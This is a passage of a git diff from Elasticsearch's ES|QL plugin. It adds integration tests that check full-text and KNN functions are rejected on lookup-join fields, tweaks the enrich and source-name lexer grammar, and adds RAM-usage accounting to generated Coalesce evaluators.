-28,7 +28,7 @@ import org.elasticsearch.compute.lucene.LuceneSliceQueue; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.ShardContext; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.DriverRunner; @@ -60,6 +60,7 @@ import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.enrich.LookupFromIndexOperator; import org.elasticsearch.xpack.esql.planner.EsPhysicalOperationProviders; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; import org.elasticsearch.xpack.esql.plugin.QueryPragmas; @@ -198,6 +199,7 @@ private void runLookup(DataType keyType, PopulateIndices populateIndices) throws false // no scoring ); ValuesSourceReaderOperator.Factory reader = new ValuesSourceReaderOperator.Factory( + PhysicalSettings.VALUES_LOADING_JUMBO_SIZE.getDefault(Settings.EMPTY), List.of( new ValuesSourceReaderOperator.FieldInfo( "key", diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java index df021f27a31fe..731b2976f88d8 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupJoinTypesIT.java @@ -19,6 +19,8 @@ import org.elasticsearch.xpack.core.esql.action.ColumnInfo; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.expression.function.DocsV3Support; +import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry; import org.elasticsearch.xpack.esql.plan.logical.join.Join; import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; import org.elasticsearch.xpack.spatial.SpatialPlugin; @@ -36,6 +38,7 @@ import java.util.Map; import java.util.Set; import java.util.function.Consumer; +import java.util.function.Supplier; import java.util.stream.Collectors; import static org.elasticsearch.test.ESIntegTestCase.Scope.SUITE; @@ -265,6 +268,22 @@ private static boolean existingIndex(Collection existing, DataType return existing.stream().anyMatch(c -> c.exists(indexName)); } + /** This test generates documentation for the supported output types of the lookup join. */ + public void testOutputSupportedTypes() throws Exception { + Map, DataType> signatures = new LinkedHashMap<>(); + for (TestConfigs configs : testConfigurations.values()) { + if (configs.group.equals("unsupported") || configs.group.equals("union-types")) { + continue; + } + for (TestConfig config : configs.configs.values()) { + if (config instanceof TestConfigPasses) { + signatures.put(List.of(config.mainType(), config.lookupType()), null); + } + } + } + saveJoinTypes(() -> signatures); + } + public void testLookupJoinStrings() { testLookupJoinTypes("strings"); } @@ -747,4 +766,18 @@ public void doTest() { private boolean isValidDataType(DataType dataType) { return UNDER_CONSTRUCTION.get(dataType) == null || UNDER_CONSTRUCTION.get(dataType).isEnabled(); } + + private static void saveJoinTypes(Supplier, DataType>> signatures) throws Exception { + ArrayList args = new ArrayList<>(); + args.add(new EsqlFunctionRegistry.ArgSignature("field from the left index", null, null, false, false)); + args.add(new EsqlFunctionRegistry.ArgSignature("field from the lookup index", null, null, false, false)); + DocsV3Support.CommandsDocsSupport docs = new DocsV3Support.CommandsDocsSupport( + "lookup-join", + LookupJoinTypesIT.class, + null, + args, + signatures + ); + docs.renderDocs(); + } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java index e1ef6730c1f05..541e6a1421946 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/CanMatchIT.java @@ -19,8 +19,10 @@ import org.elasticsearch.index.shard.ShardId; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.transport.MockTransportService; +import org.elasticsearch.transport.RemoteClusterAware; import org.elasticsearch.transport.TransportService; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; +import org.elasticsearch.xpack.esql.action.EsqlExecutionInfo; import org.elasticsearch.xpack.esql.action.EsqlQueryResponse; import java.util.Collection; @@ -363,6 +365,10 @@ public void testFailOnUnavailableShards() throws Exception { syncEsqlQueryRequest().query("from events,logs | KEEP timestamp,message").allowPartialResults(true) ) ) { + assertTrue(resp.isPartial()); + EsqlExecutionInfo.Cluster local = resp.getExecutionInfo().getCluster(RemoteClusterAware.LOCAL_CLUSTER_GROUP_KEY); + assertThat(local.getFailures(), hasSize(1)); + assertThat(local.getFailures().get(0).reason(), containsString("index [logs] has no active shard copy")); assertThat(getValuesList(resp), hasSize(3)); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java index a262943909938..a107e58c0869c 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KnnFunctionIT.java @@ -8,11 +8,14 @@ package org.elasticsearch.xpack.esql.plugin; import org.elasticsearch.action.index.IndexRequestBuilder; +import org.elasticsearch.client.internal.IndicesAdminClient; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.index.IndexSettings; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentFactory; import org.elasticsearch.xpack.esql.EsqlTestUtils; +import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; import org.elasticsearch.xpack.esql.action.EsqlCapabilities; import org.junit.Before; @@ -25,7 +28,9 @@ import java.util.Locale; import java.util.Map; +import static org.elasticsearch.index.IndexMode.LOOKUP; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.hamcrest.CoreMatchers.containsString; public class KnnFunctionIT extends AbstractEsqlIntegTestCase { @@ -109,6 +114,26 @@ public void testKnnNonPushedDown() { } } + public void testKnnWithLookupJoin() { + float[] queryVector = new float[numDims]; + Arrays.fill(queryVector, 1.0f); + + var query = String.format(Locale.ROOT, """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE KNN(lookup_vector, %s, {"k": 5}) OR id > 10 + """, Arrays.toString(queryVector)); + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:13: [KNN] function cannot operate on [lookup_vector], supplied by an index [test_lookup] in non-STANDARD " + + "mode [lookup]" + ) + ); + } + @Before public void setup() throws IOException { assumeTrue("Needs KNN support", EsqlCapabilities.Cap.KNN_FUNCTION.isEnabled()); @@ -152,5 +177,31 @@ public void setup() throws IOException { } indexRandom(true, docs); + + createAndPopulateLookupIndex(client, "test_lookup"); + } + + private void createAndPopulateLookupIndex(IndicesAdminClient client, String lookupIndexName) throws IOException { + XContentBuilder mapping = XContentFactory.jsonBuilder() + .startObject() + .startObject("properties") + .startObject("id") + .field("type", "integer") + .endObject() + .startObject("lookup_vector") + .field("type", "dense_vector") + .field("similarity", "l2_norm") + .endObject() + .endObject() + .endObject(); + + Settings.Builder settingsBuilder = Settings.builder() + .put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0) + .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) + .put(IndexSettings.MODE.getKey(), LOOKUP.getName()); + + var createRequest = client.prepareCreate(lookupIndexName).setMapping(mapping).setSettings(settingsBuilder.build()); + assertAcked(createRequest); + } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java index 10a17bb05135b..e8f14ef8388b7 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/KqlFunctionIT.java @@ -75,12 +75,12 @@ public void testKqlQueryWithinEval() { public void testInvalidKqlQueryEof() { var query = """ FROM test - | WHERE kql("content: ((((dog") + | WHERE kql("content: (dog") """; var error = expectThrows(QueryShardException.class, () -> run(query)); - assertThat(error.getMessage(), containsString("Failed to parse KQL query [content: ((((dog]")); - assertThat(error.getRootCause().getMessage(), containsString("line 1:11: mismatched input '('")); + assertThat(error.getMessage(), containsString("Failed to parse KQL query [content: (dog]")); + assertThat(error.getRootCause().getMessage(), containsString("line 1:14: missing ')' at ''")); } public void testInvalidKqlQueryLexicalError() { diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java index 23958fcd35f30..82124c4c85bb8 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchFunctionIT.java @@ -10,6 +10,7 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.client.internal.IndicesAdminClient; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; @@ -17,6 +18,7 @@ import org.junit.Before; import java.util.List; +import java.util.function.Consumer; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.xpack.esql.EsqlTestUtils.getValuesList; @@ -27,7 +29,7 @@ public class MatchFunctionIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } public void testSimpleWhereMatch() { @@ -294,13 +296,30 @@ public void testMatchWithinEval() { assertThat(error.getMessage(), containsString("[MATCH] function is only supported in WHERE and STATS commands")); } - private void createAndPopulateIndex() { + public void testMatchWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND MATCH(lookup_content, "fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:26: [MATCH] function cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" + ) + ); + } + + static void createAndPopulateIndex(Consumer ensureYellow) { var indexName = "test"; var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) + var createRequest = client.prepareCreate(indexName) .setSettings(Settings.builder().put("index.number_of_shards", 1)) .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); + assertAcked(createRequest); client().prepareBulk() .add(new IndexRequest(indexName).id("1").source("id", 1, "content", "This is a brown fox")) .add(new IndexRequest(indexName).id("2").source("id", 2, "content", "This is a brown dog")) @@ -310,6 +329,17 @@ private void createAndPopulateIndex() { .add(new IndexRequest(indexName).id("6").source("id", 6, "content", "The quick brown fox jumps over the lazy dog")) .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) .get(); - ensureYellow(indexName); + + var lookupIndexName = "test_lookup"; + createAndPopulateLookupIndex(client, lookupIndexName); + + ensureYellow.accept(new String[] { indexName, lookupIndexName }); + } + + static void createAndPopulateLookupIndex(IndicesAdminClient client, String lookupIndexName) { + var createRequest = client.prepareCreate(lookupIndexName) + .setSettings(Settings.builder().put("index.number_of_shards", 1).put("index.mode", "lookup")) + .setMapping("id", "type=integer", "lookup_content", "type=text"); + assertAcked(createRequest); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java index 5a87a4b4302c4..efad0f92ae967 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchOperatorIT.java @@ -8,9 +8,6 @@ package org.elasticsearch.xpack.esql.plugin; import org.elasticsearch.ElasticsearchException; -import org.elasticsearch.action.index.IndexRequest; -import org.elasticsearch.action.support.WriteRequest; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.QueryBuilders; import org.elasticsearch.xpack.esql.VerificationException; @@ -21,7 +18,6 @@ import static org.elasticsearch.index.query.QueryBuilders.boolQuery; import static org.elasticsearch.index.query.QueryBuilders.matchQuery; -import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.xpack.esql.action.EsqlQueryRequest.syncEsqlQueryRequest; import static org.hamcrest.CoreMatchers.containsString; @@ -30,7 +26,7 @@ public class MatchOperatorIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + MatchFunctionIT.createAndPopulateIndex(this::ensureYellow); } public void testSimpleWhereMatch() { @@ -372,22 +368,20 @@ public void testMatchWithNonTextField() { } } - private void createAndPopulateIndex() { - var indexName = "test"; - var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) - .setSettings(Settings.builder().put("index.number_of_shards", 1)) - .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); - client().prepareBulk() - .add(new IndexRequest(indexName).id("1").source("id", 1, "content", "This is a brown fox")) - .add(new IndexRequest(indexName).id("2").source("id", 2, "content", "This is a brown dog")) - .add(new IndexRequest(indexName).id("3").source("id", 3, "content", "This dog is really brown")) - .add(new IndexRequest(indexName).id("4").source("id", 4, "content", "The dog is brown but this document is very very long")) - .add(new IndexRequest(indexName).id("5").source("id", 5, "content", "There is also a white cat")) - .add(new IndexRequest(indexName).id("6").source("id", 6, "content", "The quick brown fox jumps over the lazy dog")) - .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) - .get(); - ensureYellow(indexName); + public void testMatchOperatorWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND lookup_content : "fox" + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:20: [:] operator cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" + ) + ); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java index 44f28e0c9ea93..f269fc7d2bd46 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/MatchPhraseFunctionIT.java @@ -8,9 +8,6 @@ package org.elasticsearch.xpack.esql.plugin; import org.elasticsearch.ElasticsearchException; -import org.elasticsearch.action.index.IndexRequest; -import org.elasticsearch.action.support.WriteRequest; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; import org.hamcrest.Matchers; @@ -19,8 +16,8 @@ import java.util.Collections; import java.util.List; -import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.xpack.esql.EsqlTestUtils.getValuesList; +import static org.elasticsearch.xpack.esql.plugin.MatchFunctionIT.createAndPopulateIndex; import static org.hamcrest.CoreMatchers.containsString; //@TestLogging(value = "org.elasticsearch.xpack.esql:TRACE,org.elasticsearch.compute:TRACE", reason = "debug") @@ -28,7 +25,7 @@ public class MatchPhraseFunctionIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } public void testSimpleWhereMatchPhrase() { @@ -325,22 +322,20 @@ public void testMatchPhraseWithinEval() { assertThat(error.getMessage(), containsString("[MatchPhrase] function is only supported in WHERE and STATS commands")); } - private void createAndPopulateIndex() { - var indexName = "test"; - var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) - .setSettings(Settings.builder().put("index.number_of_shards", 1)) - .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); - client().prepareBulk() - .add(new IndexRequest(indexName).id("1").source("id", 1, "content", "This is a brown fox")) - .add(new IndexRequest(indexName).id("2").source("id", 2, "content", "This is a brown dog")) - .add(new IndexRequest(indexName).id("3").source("id", 3, "content", "This dog is really brown")) - .add(new IndexRequest(indexName).id("4").source("id", 4, "content", "The dog is brown but this document is very very long")) - .add(new IndexRequest(indexName).id("5").source("id", 5, "content", "There is also a white cat")) - .add(new IndexRequest(indexName).id("6").source("id", 6, "content", "The quick brown fox jumps over the lazy dog")) - .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) - .get(); - ensureYellow(indexName); + public void testMatchPhraseWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND MATCH_PHRASE(lookup_content, "fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:33: [MatchPhrase] function cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" + ) + ); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java index aba0a5f4a5b97..d241580545c31 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java @@ -16,15 +16,17 @@ import org.junit.Before; import java.util.List; +import java.util.function.Consumer; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.elasticsearch.xpack.esql.plugin.MatchFunctionIT.createAndPopulateLookupIndex; import static org.hamcrest.CoreMatchers.containsString; public class QueryStringIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } public void testSimpleQueryString() { @@ -91,7 +93,7 @@ public void testInvalidQueryStringLexicalError() { ); } - private void createAndPopulateIndex() { + static void createAndPopulateIndex(Consumer ensureYellow) { var indexName = "test"; var client = client().admin().indices(); var CreateRequest = client.prepareCreate(indexName) @@ -135,7 +137,11 @@ private void createAndPopulateIndex() { ) .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) .get(); - ensureYellow(indexName); + + var lookupIndexName = "test_lookup"; + createAndPopulateLookupIndex(client, lookupIndexName); + + ensureYellow.accept(new String[] { indexName, lookupIndexName }); } public void testWhereQstrWithScoring() { @@ -228,4 +234,15 @@ AND abs(id) > 0 assertValuesInAnyOrder(resp.values(), List.of(List.of(5, 1.0), List.of(4, 1.0))); } } + + public void testWhereQstrWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND QSTR("lookup_content: fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat(error.getMessage(), containsString("line 3:3: [QSTR] function cannot be used after LOOKUP")); + } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java index 9afefca5eed6e..a56dec2ff4883 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java @@ -7,9 +7,6 @@ package org.elasticsearch.xpack.esql.plugin; -import org.elasticsearch.action.index.IndexRequest; -import org.elasticsearch.action.support.WriteRequest; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; import org.elasticsearch.xpack.esql.action.EsqlCapabilities; @@ -19,14 +16,14 @@ import java.util.List; -import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.elasticsearch.xpack.esql.plugin.QueryStringIT.createAndPopulateIndex; import static org.hamcrest.CoreMatchers.containsString; public class TermIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } @Override @@ -90,50 +87,20 @@ public void testNotWhereTerm() { } } - private void createAndPopulateIndex() { - var indexName = "test"; - var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) - .setSettings(Settings.builder().put("index.number_of_shards", 1)) - .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); - client().prepareBulk() - .add( - new IndexRequest(indexName).id("1") - .source("id", 1, "content", "The quick brown animal swiftly jumps over a lazy dog", "title", "A Swift Fox's Journey") - ) - .add( - new IndexRequest(indexName).id("2") - .source("id", 2, "content", "A speedy brown fox hops effortlessly over a sluggish canine", "title", "The Fox's Leap") - ) - .add( - new IndexRequest(indexName).id("3") - .source("id", 3, "content", "Quick and nimble, the fox vaults over the lazy dog", "title", "Brown Fox in Action") - ) - .add( - new IndexRequest(indexName).id("4") - .source( - "id", - 4, - "content", - "A fox that is quick and brown jumps over a dog that is quite lazy", - "title", - "Speedy Animals" - ) - ) - .add( - new IndexRequest(indexName).id("5") - .source( - "id", - 5, - "content", - "With agility, a quick brown fox bounds over a slow-moving dog", - "title", - "Foxes and Canines" - ) + public void testTermWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND TERM(lookup_content, "fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:25: [Term] function cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" ) - .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) - .get(); - ensureYellow(indexName); + ); } } diff --git a/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 b/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 index c03e336eeb11f..86044901c716f 100644 --- a/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 +++ b/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 @@ -251,7 +251,12 @@ showCommand ; enrichCommand - : ENRICH policyName=ENRICH_POLICY_NAME (ON matchField=qualifiedNamePattern)? (WITH enrichWithClause (COMMA enrichWithClause)*)? + : ENRICH policyName=enrichPolicyName (ON matchField=qualifiedNamePattern)? (WITH enrichWithClause (COMMA enrichWithClause)*)? + ; + +enrichPolicyName + : ENRICH_POLICY_NAME + | QUOTED_STRING ; enrichWithClause diff --git a/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4 b/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4 index 415355260da35..6e933998dc34c 100644 --- a/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4 +++ b/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4 @@ -24,7 +24,7 @@ ENRICH_WITH : WITH -> type(WITH), pushMode(ENRICH_FIELD_MODE); // similar to that of an index // see https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-create-index.html#indices-create-api-path-params fragment ENRICH_POLICY_NAME_BODY - : ~[\\/?"<>| ,#\t\r\n:] + : ~[\\/?"<>| ,#\t\r\n:()] ; ENRICH_POLICY_NAME @@ -36,6 +36,8 @@ ENRICH_MODE_UNQUOTED_VALUE : ENRICH_POLICY_NAME -> type(ENRICH_POLICY_NAME) ; +ENRICH_QUOTED_POLICY_NAME : QUOTED_STRING -> type(QUOTED_STRING); + ENRICH_LINE_COMMENT : LINE_COMMENT -> channel(HIDDEN) ; diff --git a/x-pack/plugin/esql/src/main/antlr/lexer/From.g4 b/x-pack/plugin/esql/src/main/antlr/lexer/From.g4 index 8ea8306b58be6..866c0934984e4 100644 --- a/x-pack/plugin/esql/src/main/antlr/lexer/From.g4 +++ b/x-pack/plugin/esql/src/main/antlr/lexer/From.g4 @@ -29,7 +29,7 @@ FROM_RP : RP -> type(RP), popMode; // in 8.14 ` were not allowed // this has been relaxed in 8.15 since " is used for quoting fragment UNQUOTED_SOURCE_PART - : ~[:"=|,[\]/ \t\r\n] + : ~[:"=|,[\]/() \t\r\n] | '/' ~[*/] // allow single / but not followed by another / or * which would start a comment -- used in index pattern date spec ; diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java index 15f976d6e4090..48c617bc06ec4 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.nulls; // begin generated imports +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.Page; @@ -25,12 +26,14 @@ /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class CoalesceBooleanEvaluator implements EvalOperator.ExpressionEvaluator permits CoalesceBooleanEvaluator.CoalesceBooleanEagerEvaluator, // CoalesceBooleanEvaluator.CoalesceBooleanLazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceBooleanEvaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -130,6 +133,15 @@ public final String toString() { return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java index 547c325ccf132..f05202d4e5b39 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.Page; @@ -26,12 +27,14 @@ /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class CoalesceBytesRefEvaluator implements EvalOperator.ExpressionEvaluator permits CoalesceBytesRefEvaluator.CoalesceBytesRefEagerEvaluator, // CoalesceBytesRefEvaluator.CoalesceBytesRefLazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceBytesRefEvaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -131,6 +134,15 @@ public final String toString() { return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git 